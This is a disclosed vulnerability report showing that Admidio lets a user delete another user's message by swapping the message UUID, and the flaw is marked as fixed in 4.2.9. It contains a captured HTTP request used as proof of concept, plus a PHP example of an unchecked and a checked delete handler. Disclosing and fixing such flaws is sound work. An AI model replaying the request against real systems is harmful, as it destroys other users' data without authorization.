IDOR in message deletion in admidio/admidio

Valid

Reported on Jun 11th 2023


Description

A user can delete other users' messages. We know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that one case was not fixed.

Proof of Concept

1. user1 sends admin a greeting card1.

2. user2 sends admin a greeting card2.

3. user1 deletes his message related to greeting card1, using Burp Suite to hijack the request.

POST /adm_program/modules/messages/messages.php?msg_uuid=7cd5f4ed-dedc-46c6-b4ec-3567246583ef HTTP/1.1
Host: localhost:8080
Content-Length: 49
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/adm_program/modules/messages/messages.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; BBLANG=en_US; ADMIDIO_admidio_adm_SESSION_ID=beedb93711a4307d7d676817daeefd7b
Connection: close

admidio-csrf-token=6amCNCtp5js7GH8g2UwyHOU88PKm2M

4. Change the message UUID to that of the message related to card2.

5. The result shows success.

IDORs with unpredictable IDs are valid vulnerabilities; see https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html

As the UUID is hard to predict, we mark Attack Complexity as high.

Impact

Impact of the Vulnerability:

This vulnerability allows a user to delete messages of other users, which can result in a loss of important communication data. This can also lead to unauthorized editing or deleting of messages, causing potential security issues for the impacted users. Additionally, an attacker may use this vulnerability to tamper with the message history and cover up their tracks, making it difficult to trace any malicious activity.

We are processing your report and will contact the admidio team within 24 hours. 3 months ago
lujiefsi modified the report 3 months ago
lujiefsi modified the report 3 months ago
We have contacted a member of the admidio team and are waiting to hear back 3 months ago
lujiefsi modified the report 3 months ago
Markus Faßbender validated this vulnerability 3 months ago
lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Markus Faßbender marked this as fixed in 4.2.9 with commit 3b248b 3 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jun 18th 2023
Markus Faßbender published this vulnerability 3 months ago
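
The missing check this report describes, as an added PHP example that is not code from the report or from Admidio: a delete handler without and with an ownership check, replayed over the report's scenario. The class, method and field names and the UUID strings are hypothetical, and it assumes that only the sender and the recipient of a message may delete it.

```php
<?php
declare(strict_types=1);

// Constructed in-memory message store. Field names and UUID strings are
// hypothetical placeholders, not Admidio's schema or real identifiers.
final class MessageStore
{
    /** @var array<string, array{sender: string, recipient: string}> */
    private array $messages = [
        'card1-uuid' => ['sender' => 'user1', 'recipient' => 'admin'],
        'card2-uuid' => ['sender' => 'user2', 'recipient' => 'admin'],
    ];

    // Vulnerable pattern: a valid session is enough, so any logged-in user
    // can delete whichever UUID the request carries.
    public function deleteUnchecked(string $currentUser, string $msgUuid): bool
    {
        if (!isset($this->messages[$msgUuid])) {
            return false;
        }
        unset($this->messages[$msgUuid]);
        return true;
    }

    // Hardened pattern: the caller must be a participant of the message.
    // "Not found" and "not yours" return the same result, so the response
    // does not confirm whether a guessed UUID exists.
    public function deleteChecked(string $currentUser, string $msgUuid): bool
    {
        $msg = $this->messages[$msgUuid] ?? null;
        if ($msg === null
            || !in_array($currentUser, [$msg['sender'], $msg['recipient']], true)) {
            return false;
        }
        unset($this->messages[$msgUuid]);
        return true;
    }

    public function exists(string $msgUuid): bool
    {
        return isset($this->messages[$msgUuid]);
    }
}

$store = new MessageStore();
var_dump($store->deleteChecked('user1', 'card2-uuid'));   // user1 against user2's message
var_dump($store->exists('card2-uuid'));                   // is card2's message still stored?
var_dump($store->deleteChecked('user1', 'card1-uuid'));   // user1 against his own message
var_dump($store->deleteUnchecked('user1', 'card2-uuid')); // the behaviour reported above
```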